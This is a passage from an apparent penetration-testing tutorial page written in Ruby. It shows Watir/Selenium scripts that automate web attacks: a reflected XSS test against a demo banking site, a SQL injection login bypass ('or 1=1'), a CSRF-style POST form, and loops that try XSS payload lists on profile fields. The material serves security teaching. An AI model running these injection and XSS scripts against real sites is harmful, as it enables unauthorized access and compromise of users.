1365
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'watir-webdriver'</span>
|
1366
|
+
|
1367
|
+
browser = <span class="hljs-constant">Watir::Browser</span>.new <span class="hljs-symbol">:firefox</span>
|
1368
|
+
wait = <span class="hljs-constant">Selenium::WebDriver::Wait</span>.new(<span class="hljs-symbol">:timeout</span> => <span class="hljs-number">15</span>)
|
1369
|
+
|
1370
|
+
<span class="hljs-keyword">begin</span>
|
1371
|
+
browser.goto(<span class="hljs-string">"http://www.altoromutual.com/search.aspx?txtSearch=<img src=x onerror=alert(1)>"</span>)
|
1372
|
+
<span class="hljs-keyword">rescue</span> <span class="hljs-constant">Selenium::WebDriver::Error::UnhandledAlertError</span>
|
1373
|
+
browser.refresh
|
1374
|
+
wait.<span class="hljs-keyword">until</span> {browser.alert.exists?}
|
1375
|
+
<span class="hljs-keyword">end</span>
|
1376
|
+
|
1377
|
+
<span class="hljs-keyword">if</span> browser.alert.exists?
|
1378
|
+
browser.alert.ok
|
1379
|
+
puts <span class="hljs-string">"[+] Exploit found!"</span>
|
1380
|
+
browser.close
|
1381
|
+
<span class="hljs-keyword">end</span>
|
1382
|
+
</code></pre>
|
1383
|
+
<h3 id="post-request"><a name="post-request" class="plugin-anchor" href="#post-request"><span class="fa fa-link"></span></a>POST Request</h3>
|
1384
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1385
|
+
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
|
1386
|
+
<span class="hljs-comment">#</span>
|
1387
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'watir-webdriver'</span>
|
1388
|
+
|
1389
|
+
browser = <span class="hljs-constant">Watir::Browser</span>.new <span class="hljs-symbol">:firefox</span>
|
1390
|
+
browser.window.resize_to(<span class="hljs-number">800</span>, <span class="hljs-number">600</span>)
|
1391
|
+
browser.window.move_to(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>)
|
1392
|
+
browser.goto <span class="hljs-string">"http://www.altoromutual.com/bank/login.aspx"</span>
|
1393
|
+
browser.text_field(<span class="hljs-symbol">name:</span> <span class="hljs-string">'uid'</span>).set(<span class="hljs-string">"' or 1=1;-- "</span>)
|
1394
|
+
browser.text_field(<span class="hljs-symbol">name:</span> <span class="hljs-string">'passw'</span>).set(<span class="hljs-string">"password"</span>)
|
1395
|
+
btn = browser.button(<span class="hljs-symbol">name:</span> <span class="hljs-string">'btnSubmit'</span>).click
|
1396
|
+
|
1397
|
+
<span class="hljs-comment"># browser.close</span>
|
1398
|
+
</code></pre>
|
1399
|
+
<blockquote>
|
1400
|
+
<ul>
|
1401
|
+
<li>Since Waiter is integrated with Selenium, you can use both to achieve one goal </li>
|
1402
|
+
<li>For Some reason in some log-in cases, you may need to add a delay time between entering username and password then submit.</li>
|
1403
|
+
</ul>
|
1404
|
+
</blockquote>
|
1405
|
+
<h2 id="selenium-watir-arbitrary-post-request"><a name="selenium-watir-arbitrary-post-request" class="plugin-anchor" href="#selenium-watir-arbitrary-post-request"><span class="fa fa-link"></span></a>Selenium, Watir Arbitrary POST request</h2>
|
1406
|
+
<p>Here another scenario I've faced, I was against POST request without submit button, in another word, the test was against intercepted request generated from jQuery function, in my case was a drop menu. So The work round wad quite simple, Just create an HTML file contains POST form with the original parameters plus a <strong>Submit button</strong>(<strong><em>just like creating CSRF exploit from a POST form</em></strong>) then call that html file to the browser and deal with it as normal form. Let's to see an example here.</p>
|
1407
|
+
<p><strong>POST request</strong></p>
|
1408
|
+
<pre><code>POST /path/of/editfunction HTTP/1.1
|
1409
|
+
Host: example.com
|
1410
|
+
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
|
1411
|
+
Accept: */*
|
1412
|
+
Accept-Language: en-US,en;q=0.5
|
1413
|
+
Accept-Encoding: gzip, deflate
|
1414
|
+
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
1415
|
+
X-Requested-With: XMLHttpRequest
|
1416
|
+
Content-Length: 100
|
1417
|
+
Cookie: PHPSESSIONID=111111111111111111111
|
1418
|
+
Connection: keep-alive
|
1419
|
+
Pragma: no-cache
|
1420
|
+
Cache-Control: no-cache
|
1421
|
+
|
1422
|
+
field1=""&field2=""&field3=""&field4=""
|
1423
|
+
</code></pre><p><strong>example.html</strong></p>
|
1424
|
+
<pre><code class="lang-html"><span class="hljs-tag"><<span class="hljs-title">html</span>></span>
|
1425
|
+
<span class="hljs-tag"><<span class="hljs-title">head</span>></span>
|
1426
|
+
<span class="hljs-tag"><<span class="hljs-title">title</span>></span>Victim Site - POST request<span class="hljs-tag"></<span class="hljs-title">title</span>></span>
|
1427
|
+
<span class="hljs-tag"></<span class="hljs-title">head</span>></span>
|
1428
|
+
<span class="hljs-tag"><<span class="hljs-title">body</span>></span>
|
1429
|
+
<span class="hljs-tag"><<span class="hljs-title">form</span> <span class="hljs-attribute">action</span>=<span class="hljs-value">"https://example.com/path/of/editfunction"</span> <span class="hljs-attribute">method</span>=<span class="hljs-value">"POST"</span>></span>
|
1430
|
+
<span class="hljs-tag"><<span class="hljs-title">input</span> <span class="hljs-attribute">type</span>=<span class="hljs-value">"text"</span> <span class="hljs-attribute">name</span>=<span class="hljs-value">"field1"</span> <span class="hljs-attribute">value</span>=<span class="hljs-value">""</span> /></span>
|
1431
|
+
<span class="hljs-tag"><<span class="hljs-title">input</span> <span class="hljs-attribute">type</span>=<span class="hljs-value">"text"</span> <span class="hljs-attribute">name</span>=<span class="hljs-value">"field2"</span> <span class="hljs-attribute">value</span>=<span class="hljs-value">""</span> /></span>
|
1432
|
+
<span class="hljs-tag"><<span class="hljs-title">input</span> <span class="hljs-attribute">type</span>=<span class="hljs-value">"text"</span> <span class="hljs-attribute">name</span>=<span class="hljs-value">"field3"</span> <span class="hljs-attribute">value</span>=<span class="hljs-value">""</span> /></span>
|
1433
|
+
<span class="hljs-tag"><<span class="hljs-title">input</span> <span class="hljs-attribute">type</span>=<span class="hljs-value">"text"</span> <span class="hljs-attribute">name</span>=<span class="hljs-value">"field4"</span> <span class="hljs-attribute">value</span>=<span class="hljs-value">""</span> /></span>
|
1434
|
+
<span class="hljs-tag"><<span class="hljs-title">p</span>></span><span class="hljs-tag"><<span class="hljs-title">input</span> <span class="hljs-attribute">type</span>=<span class="hljs-value">"submit"</span> <span class="hljs-attribute">value</span>=<span class="hljs-value">"Send"</span> /></span><span class="hljs-tag"></<span class="hljs-title">p</span>></span>
|
1435
|
+
<span class="hljs-tag"></<span class="hljs-title">form</span>></span>
|
1436
|
+
<span class="hljs-tag"></<span class="hljs-title">body</span>></span>
|
1437
|
+
<span class="hljs-tag"></<span class="hljs-title">html</span>></span>
|
1438
|
+
</code></pre>
|
1439
|
+
<p><strong>exploit.rb</strong></p>
|
1440
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1441
|
+
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
|
1442
|
+
<span class="hljs-comment">#</span>
|
1443
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'watir-webdriver'</span>
|
1444
|
+
|
1445
|
+
<span class="hljs-variable">@browser</span> = <span class="hljs-constant">Watir::Browser</span>.new <span class="hljs-symbol">:firefox</span>
|
1446
|
+
<span class="hljs-variable">@browser</span>.window.resize_to(<span class="hljs-number">800</span>, <span class="hljs-number">600</span>) <span class="hljs-comment"># Set browser size</span>
|
1447
|
+
<span class="hljs-variable">@browser</span>.window.move_to(<span class="hljs-number">400</span>, <span class="hljs-number">300</span>) <span class="hljs-comment"># Allocate browser position </span>
|
1448
|
+
|
1449
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">sendpost</span><span class="hljs-params">(payload)</span></span>
|
1450
|
+
<span class="hljs-variable">@browser</span>.goto <span class="hljs-string">"file:///home/KING/Code/example.html"</span>
|
1451
|
+
|
1452
|
+
<span class="hljs-variable">@browser</span>.text_field(<span class="hljs-symbol">name:</span> <span class="hljs-string">'field1'</span>).set(payload)
|
1453
|
+
<span class="hljs-variable">@browser</span>.text_field(<span class="hljs-symbol">name:</span> <span class="hljs-string">'field2'</span>).set(payload)
|
1454
|
+
<span class="hljs-variable">@browser</span>.text_field(<span class="hljs-symbol">name:</span> <span class="hljs-string">'field3'</span>).set(payload)
|
1455
|
+
<span class="hljs-variable">@browser</span>.text_field(<span class="hljs-symbol">name:</span> <span class="hljs-string">'field4'</span>).set(payload)
|
1456
|
+
sleep <span class="hljs-number">0</span>.<span class="hljs-number">1</span>
|
1457
|
+
<span class="hljs-variable">@browser</span>.button(<span class="hljs-symbol">value:</span> <span class="hljs-string">'Send'</span>).click
|
1458
|
+
<span class="hljs-keyword">end</span>
|
1459
|
+
|
1460
|
+
payloads =
|
1461
|
+
[
|
1462
|
+
<span class="hljs-string">'"><script>alert(1)</script>'</span>,
|
1463
|
+
<span class="hljs-string">'<img src=x onerror=alert(2)>'</span>
|
1464
|
+
]
|
1465
|
+
|
1466
|
+
puts <span class="hljs-string">"[*] Exploitation start"</span>
|
1467
|
+
puts <span class="hljs-string">"[*] Number of payloads: <span class="hljs-subst">#{payloads.size}</span> payloads"</span>
|
1468
|
+
payloads.each <span class="hljs-keyword">do</span> |payload|
|
1469
|
+
print <span class="hljs-string">"\r[*] Trying: <span class="hljs-subst">#{payload}</span>"</span>
|
1470
|
+
print <span class="hljs-string">"\e[K"</span>
|
1471
|
+
sendpost payload
|
1472
|
+
|
1473
|
+
<span class="hljs-keyword">if</span> <span class="hljs-variable">@browser</span>.alert.exists?
|
1474
|
+
<span class="hljs-variable">@browser</span>.alert.ok
|
1475
|
+
puts <span class="hljs-string">"[+] Exploit found!: "</span> + payload
|
1476
|
+
<span class="hljs-variable">@browser</span>.close
|
1477
|
+
<span class="hljs-keyword">end</span>
|
1478
|
+
<span class="hljs-keyword">end</span>
|
1479
|
+
</code></pre>
|
1480
|
+
<h3 id="dealing-with-tabs"><a name="dealing-with-tabs" class="plugin-anchor" href="#dealing-with-tabs"><span class="fa fa-link"></span></a>Dealing with tabs</h3>
|
1481
|
+
<p>One of scenarios I've faced is to exploit XSS a user profile fields and check the result in another page which present the public user's profile. Instead of revisiting the URLs again and again I open new tab and refresh the public user's profile page then return back to send the exploit and so on.</p>
|
1482
|
+
<p><strong>xss_tab.rb</strong></p>
|
1483
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1484
|
+
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
|
1485
|
+
<span class="hljs-comment">#</span>
|
1486
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'watir-webdriver'</span>
|
1487
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'uri'</span>
|
1488
|
+
|
1489
|
+
<span class="hljs-variable">@url</span> = <span class="hljs-constant">URI</span>.parse <span class="hljs-string">"http://example.com/Users/User_Edit.aspx?userid=68"</span>
|
1490
|
+
|
1491
|
+
<span class="hljs-variable">@browser</span> = <span class="hljs-constant">Watir::Browser</span>.new <span class="hljs-symbol">:firefox</span>
|
1492
|
+
<span class="hljs-variable">@browser</span>.window.resize_to(<span class="hljs-number">800</span>, <span class="hljs-number">600</span>)
|
1493
|
+
<span class="hljs-comment"># <span class="hljs-doctag">@browser</span>.window.move_to(540, 165)</span>
|
1494
|
+
<span class="hljs-variable">@wait</span> = <span class="hljs-constant">Selenium::WebDriver::Wait</span>.new(<span class="hljs-symbol">:timeout</span> => <span class="hljs-number">10</span>)
|
1495
|
+
|
1496
|
+
<span class="hljs-variable">@browser</span>.goto <span class="hljs-string">"http://example.com/logon.aspx"</span>
|
1497
|
+
|
1498
|
+
<span class="hljs-comment"># Login </span>
|
1499
|
+
<span class="hljs-variable">@browser</span>.text_field(<span class="hljs-symbol">name:</span> <span class="hljs-string">'Login1$UserName'</span>).set(<span class="hljs-string">"admin"</span>)
|
1500
|
+
<span class="hljs-variable">@browser</span>.text_field(<span class="hljs-symbol">name:</span> <span class="hljs-string">'Login1$Password'</span>).set(<span class="hljs-string">"P@ssword"</span>)
|
1501
|
+
sleep <span class="hljs-number">0</span>.<span class="hljs-number">5</span>
|
1502
|
+
<span class="hljs-variable">@browser</span>.button(<span class="hljs-symbol">name:</span> <span class="hljs-string">'Login1$LoginButton'</span>).click
|
1503
|
+
|
1504
|
+
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">sendpost</span><span class="hljs-params">(payload)</span></span>
|
1505
|
+
<span class="hljs-keyword">begin</span>
|
1506
|
+
|
1507
|
+
<span class="hljs-variable">@browser</span>.switch <span class="hljs-comment"># Make sure to focus on current tab/window</span>
|
1508
|
+
<span class="hljs-variable">@browser</span>.goto <span class="hljs-string">"<span class="hljs-subst">#{<span class="hljs-variable">@url</span>.scheme}</span>://<span class="hljs-subst">#{<span class="hljs-variable">@url</span>.host}</span>/<span class="hljs-subst">#{<span class="hljs-variable">@url</span>.path}</span>?<span class="hljs-subst">#{<span class="hljs-variable">@url</span>.query}</span>"</span> <span class="hljs-comment"># Goto the URL</span>
|
1509
|
+
<span class="hljs-variable">@wait</span>.<span class="hljs-keyword">until</span> {<span class="hljs-variable">@browser</span>.text_field(<span class="hljs-symbol">id:</span> <span class="hljs-string">'txtFullName'</span>).exists?} <span class="hljs-comment"># Wait until wanted text area appear </span>
|
1510
|
+
<span class="hljs-variable">@browser</span>.text_field(<span class="hljs-symbol">id:</span> <span class="hljs-string">'txtFullName'</span>).set(payload) <span class="hljs-comment"># Set payload to the text area</span>
|
1511
|
+
<span class="hljs-variable">@browser</span>.text_field(<span class="hljs-symbol">id:</span> <span class="hljs-string">'txtFirstName'</span>).set(payload) <span class="hljs-comment"># Set payload to the text area</span>
|
1512
|
+
<span class="hljs-variable">@browser</span>.button(<span class="hljs-symbol">name:</span> <span class="hljs-string">'$actionsElem$save'</span>).click <span class="hljs-comment"># Click Save button </span>
|
1513
|
+
|
1514
|
+
<span class="hljs-keyword">rescue</span> <span class="hljs-constant">Selenium::WebDriver::Error::UnhandledAlertError</span>
|
1515
|
+
<span class="hljs-variable">@browser</span>.refresh <span class="hljs-comment"># Refresh the current page</span>
|
1516
|
+
<span class="hljs-variable">@wait</span>.<span class="hljs-keyword">until</span> {<span class="hljs-variable">@browser</span>.alert.exists?} <span class="hljs-comment"># Check if alert box appear</span>
|
1517
|
+
<span class="hljs-keyword">end</span>
|
1518
|
+
<span class="hljs-keyword">end</span>
|
1519
|
+
|
1520
|
+
payloads =
|
1521
|
+
[
|
1522
|
+
<span class="hljs-string">"\"><video src=x onerror=alert(1);>"</span>,
|
1523
|
+
<span class="hljs-string">"<img src=x onerror='alert(2)'>"</span>,
|
1524
|
+
<span class="hljs-string">"<script>alert(3)</script>"</span>,
|
1525
|
+
<span class="hljs-string">"<svg/OnlOad=prompt(4)>"</span>,
|
1526
|
+
<span class="hljs-string">"javascript:alert(5)"</span>,
|
1527
|
+
<span class="hljs-string">"alert(/6/.source)"</span>
|
1528
|
+
]
|
1529
|
+
|
1530
|
+
puts <span class="hljs-string">"[*] Exploitation start"</span>
|
1531
|
+
puts <span class="hljs-string">"[*] Number of payloads: <span class="hljs-subst">#{payloads.size}</span> payloads"</span>
|
1532
|
+
|
1533
|
+
<span class="hljs-variable">@browser</span>.send_keys(<span class="hljs-symbol">:control</span>, <span class="hljs-string">'t'</span>) <span class="hljs-comment"># Sent Ctrl+T to open new tab</span>
|
1534
|
+
<span class="hljs-variable">@browser</span>.goto <span class="hljs-string">"http://example.com/pub_prof/user/silver.aspx"</span> <span class="hljs-comment"># Goto the use's public profile</span>
|
1535
|
+
<span class="hljs-variable">@browser</span>.switch <span class="hljs-comment"># Make sure to focus on current tab/window</span>
|
1536
|
+
|
1537
|
+
payloads.each <span class="hljs-keyword">do</span> |payload|
|
1538
|
+
|
1539
|
+
<span class="hljs-variable">@browser</span>.send_keys(<span class="hljs-symbol">:alt</span>, <span class="hljs-string">'1'</span>) <span class="hljs-comment"># Send Alt+1 to go to first tab</span>
|
1540
|
+
sendpost payload
|
1541
|
+
puts <span class="hljs-string">"[*] Sending to '<span class="hljs-subst">#{<span class="hljs-variable">@browser</span>.title}</span>' Payload : <span class="hljs-subst">#{payload}</span>"</span>
|
1542
|
+
<span class="hljs-variable">@browser</span>.send_keys(<span class="hljs-symbol">:alt</span>, <span class="hljs-string">'2'</span>) <span class="hljs-comment"># Send Alt+2 to go to second tab</span>
|
1543
|
+
<span class="hljs-variable">@browser</span>.switch
|
1544
|
+
<span class="hljs-variable">@browser</span>.refresh
|
1545
|
+
puts <span class="hljs-string">"[*] Checking Payload Result on <span class="hljs-subst">#{<span class="hljs-variable">@browser</span>.title}</span>"</span>
|
1546
|
+
|
1547
|
+
<span class="hljs-keyword">if</span> <span class="hljs-variable">@browser</span>.alert.exists?
|
1548
|
+
<span class="hljs-variable">@browser</span>.alert.ok
|
1549
|
+
puts
|
1550
|
+
puts <span class="hljs-string">"[+] Exploit found!: "</span> + payload
|
1551
|
+
<span class="hljs-variable">@browser</span>.close
|
1552
|
+
exit <span class="hljs-number">0</span>
|
1553
|
+
<span class="hljs-keyword">end</span>
|
1554
|
+
|
1555
|
+
<span class="hljs-keyword">end</span>
|
1556
|
+
|
1557
|
+
<span class="hljs-variable">@browser</span>.close
|
1558
|
+
puts
|
1559
|
+
</code></pre>
|
1560
|
+
<h2 id=""><a name="" class="plugin-anchor" href="#"><span class="fa fa-link"></span></a><br><br><br></h2>
|
1561
|
+
<ul>
|
1562
|
+
<li><a href="http://docs.seleniumhq.org/docs/" target="_blank">Selenium official documentations</a></li>
|
1563
|
+
<li><a href="https://gist.github.com/kenrett/7553278" target="_blank">Selenium Cheat Sheet</a> </li>
|
1564
|
+
<li><a href="http://watirmelon.com/2011/05/05/selenium-webdriver-vs-watir-webdriver-in-ruby/" target="_blank">Selenium webdriver vs Watir-webdriver in Ruby</a></li>
|
1565
|
+
<li><a href="https://www.browserstack.com/automate/ruby" target="_blank">Writing automate test scripts in Ruby</a></li>
|
1566
|
+
<li><a href="https://swdandruby.wordpress.com/" target="_blank">Selenium WebDriver and Ruby</a></li>
|
1567
|
+
<li><a href="https://seleniumguidebook.com/" target="_blank">The Selenium Guidebook - Commercial </a></li>
|
1568
|
+
<li><a href="http://watirwebdriver.com/" target="_blank">Watir WebDriver</a></li>
|
1569
|
+
<li><a href="https://github.com/watir/watir/wiki/Cheat-Sheet" target="_blank">Watir Cheat Sheet</a></li>
|
1570
|
+
</ul>
|
1571
|
+
|
1572
|
+
|
1573
|
+
</section>
|
1574
|
+
|
1575
|
+
|
1576
|
+
</div>
|
1577
|
+
</div>
|
1578
|
+
</div>
|
1579
|
+
|
1580
|
+
|
1581
|
+
<a href="../module_0x4__web_kung_fu/extending_burpsuite.html" class="navigation navigation-prev " aria-label="Previous page: Extending Burp Suite"><i class="fa fa-angle-left"></i></a>
|
1582
|
+
|
1583
|
+
|
1584
|
+
<a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html" class="navigation navigation-next " aria-label="Next page: Web Services and APIs"><i class="fa fa-angle-right"></i></a>
|
1585
|
+
|
1586
|
+
</div>
|
1587
|
+
</div>
|
1588
|
+
|
1589
|
+
|
1590
|
+
<script src="../gitbook/app.js"></script>
|
1591
|
+
|
1592
|
+
|
1593
|
+
<script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
|
1594
|
+
|
1595
|
+
|
1596
|
+
|
1597
|
+
<script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
|
1598
|
+
|
1599
|
+
|
1600
|
+
|
1601
|
+
<script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
|
1602
|
+
|
1603
|
+
|
1604
|
+
|
1605
|
+
<script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
|
1606
|
+
|
1607
|
+
|
1608
|
+
|
1609
|
+
<script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
|
1610
|
+
|
1611
|
+
|
1612
|
+
|
1613
|
+
<script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
|
1614
|
+
|
1615
|
+
|
1616
|
+
|
1617
|
+
<script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
|
1618
|
+
|
1619
|
+
|
1620
|
+
<script>
|
1621
|
+
require(["gitbook"], function(gitbook) {
|
1622
|
+
var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
|
1623
|
+
gitbook.start(config);
|
1624
|
+
});
|
1625
|
+
</script>
|
1626
|
+
|
1627
|
+
|
1628
|
+
</body>
|
1629
|
+
|
1630
|
+
</html>
|